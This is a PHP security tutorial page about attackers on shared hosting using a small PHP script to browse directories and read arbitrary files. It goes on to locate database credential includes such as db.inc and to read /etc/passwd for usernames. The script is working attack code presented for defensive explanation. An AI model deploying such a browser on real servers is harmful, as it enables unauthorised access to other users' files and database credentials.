Home > Backend Development > PHP Tutorial > PHP Security - File System Browsing

PHP Security - File System Browsing

黄舟
Release: 2023-03-05 20:44:01
Original
900 people have browsed it



File system browsing

In addition to being able to read arbitrary files on the shared server, the attacker can also create a script that can browse the file system. Since most of your sensitive files will not be stored in the main directory of your website, this type of script is generally used to find the location of your source files. Please see the following example:

 <pre class="brush:php;toolbar:false">
 
  <?php
 
  if (isset($_GET[&#39;dir&#39;]))
  {
    ls($_GET[&#39;dir&#39;]);
  }
  elseif (isset($_GET[&#39;file&#39;]))
  {
    cat($_GET[&#39;file&#39;]);
  }
  else
  {
    ls(&#39;/&#39;);
  }
 
  function cat($file)
  {
    echo htmlentities(file_get_contents($file),
ENT_QUOTES, &#39;UTF-8&#39;));
  }
 
  function ls($dir)
  {
    $handle = dir($dir);
 
    while ($filename = $handle->read())
    {
      $size = filesize("$dir$filename");
 
      if (is_dir("$dir$filename"))
      {
        $type = &#39;dir&#39;;
        $filename .= &#39;/&#39;;
      }
      else
      {
        $type = &#39;file&#39;;
      }
 
      if (is_readable("$dir$filename"))
      {
        $line = str_pad($size, 15);
        $line .= "<a
href=\"{$_SERVER[&#39;PHP_SELF&#39;]}";
        $line .=
"?$type=$dir$filename\">$filename</a>";
      }
      else
      {
        $line = str_pad($size, 15);
        $line .= $filename;
      }
 
      echo "$line\n";
    }
 
    $handle->close();
  }
 
  ?>
 
  
Copy after login


An attacker may first look at the /etc/passwd file or /home directory to obtain a list of usernames on the server; the location of source files stored outside the website's home directory can be discovered through language structures such as include or require. For example, consider the following script file /home/victim/public_html/admin.php:

  <?php
 
  include &#39;../inc/db.inc&#39;;
 
  /* ... */
 
  ?>
Copy after login


If an attacker manages to display the source code of the file, he can discover the location of db.inc and he can use the readfile() function to expose its contents and gain access to the database. Thus, saving db.inc outside the website's home directory does not protect it in this environment.

This attack illustrates why all source files on a shared server should be considered public and the database chosen to hold all sensitive data.

The above is the content of PHP security-file system browsing. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!


Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template